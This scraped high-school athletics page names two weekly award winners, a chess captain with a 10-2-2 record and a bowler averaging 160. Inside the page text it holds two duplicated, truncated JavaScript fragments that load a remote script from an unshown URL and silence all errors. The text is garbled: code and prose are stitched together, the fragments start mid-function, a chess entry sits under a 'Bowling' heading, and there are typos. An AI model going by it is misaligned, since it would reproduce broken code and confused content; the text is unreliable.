Bowling

Kemba Credit Union Athletes of the Week 11/29/2021-12/5/2021

Sajan Shah
Senior, Chess
Chess captain Sajan placed 1st on the All GMC Team posting a seson record of 10-2-2. Shah lead the Firebirds to a 2nd place finish in the GMC Going 4-1 in GMC tournament including key wins against Sycamore and Lakota East.

 

 

 

 

 

 

Reese Volk
Sophomore, Bowling

Reese averaged 160 and was a consistent anchor leading the Firebird to their season opener.

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts